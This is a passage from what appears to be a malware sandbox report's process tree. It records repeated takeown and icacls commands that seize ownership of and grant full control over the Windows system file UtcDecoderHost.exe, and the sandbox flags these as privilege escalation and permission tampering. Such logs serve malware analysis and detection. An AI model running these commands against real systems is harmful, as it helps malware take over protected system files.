                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                            2⤵
                                                                                                            • Possible privilege escalation attempt
                                                                                                            PID:6004
                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                            2⤵
                                                                                                              PID:6064
                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                              2⤵
                                                                                                                PID:6092
                                                                                                              • C:\Windows\System32\icacls.exe
                                                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                2⤵
                                                                                                                • Possible privilege escalation attempt
                                                                                                                PID:3176
                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                2⤵
                                                                                                                  PID:3600
                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                  2⤵
                                                                                                                    PID:4508
                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                    2⤵
                                                                                                                      PID:1624
                                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                      2⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:2632
                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                      2⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:4628
                                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                      2⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      PID:2164
                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                      2⤵
                                                                                                                        PID:2804
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          3⤵
                                                                                                                            PID:3708
                                                                                                                        • C:\Windows\System32\icacls.exe
                                                                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                          2⤵
                                                                                                                          • Possible privilege escalation attempt
                                                                                                                          PID:3476
                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                          2⤵
                                                                                                                            PID:2828
                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                            2⤵
                                                                                                                            • Possible privilege escalation attempt
                                                                                                                            PID:3044
                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                            2⤵
                                                                                                                            • Possible privilege escalation attempt
                                                                                                                            PID:5284
                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                            2⤵
                                                                                                                              PID:264
                                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                              2⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:2080
                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                              2⤵
                                                                                                                                PID:4832
                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                2⤵
                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                PID:3076
                                                                                                                              • C:\Windows\System32\icacls.exe
                                                                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                2⤵
                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:5016
                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:3496
                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                  2⤵
                                                                                                                                    PID:5580
                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:3552
                                                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                      2⤵
                                                                                                                                        PID:2248
                                                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:5960
                                                                                                                                        • C:\Windows\System32\icacls.exe
                                                                                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:3864
                                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                            PID:5184
                                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:6108
                                                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:5912
                                                                                                                                              • C:\Windows\System32\icacls.exe
                                                                                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                2⤵
                                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                                PID:5188
                                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:5328
                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5396
                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                    PID:5736
                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1144
                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5432
                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5880
                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                          2⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:5464
                                                                                                                                                        • C:\Windows\System32\icacls.exe
                                                                                                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                          2⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:5716
                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5060
                                                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                            2⤵
                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                            PID:5424
                                                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:468
                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2396
                                                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1484
                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5888
                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:5700
                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:6060
                                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2484
                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4484
                                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5384
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5476
                                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1608
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1432
                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:5996
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1556
                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                    PID:4792
                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:5660
                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6092
                                                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5940
                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:6120
                                                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:5536
                                                                                                                                                                                        • C:\Windows\System32\icacls.exe
                                                                                                                                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:6124
                                                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5160
                                                                                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5820
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4832
                                                                                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1160
                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                  PID:1084
                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4508
                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:4312
                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2512
                                                                                                                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1512
                                                                                                                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:5196
                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                        PID:5132
                                                                                                                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                        PID:3560
                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5580
                                                                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5148
                                                                                                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                                                                            PID:3896
                                                                                                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4496
                                                                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5936
                                                                                                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:5516
                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:5780
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:5688
                                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:3184
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3496
                                                                                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:1196
                                                                                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1088
                                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5836
                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5184
                                                                                                                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3652
                                                                                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5540
                                                                                                                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3400
                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5656
                                                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5792
                                                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:3096
                                                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5856
                                                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                                                                    PID:2788
                                                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:4380
                                                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5968
                                                                                                                                                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                    2⤵
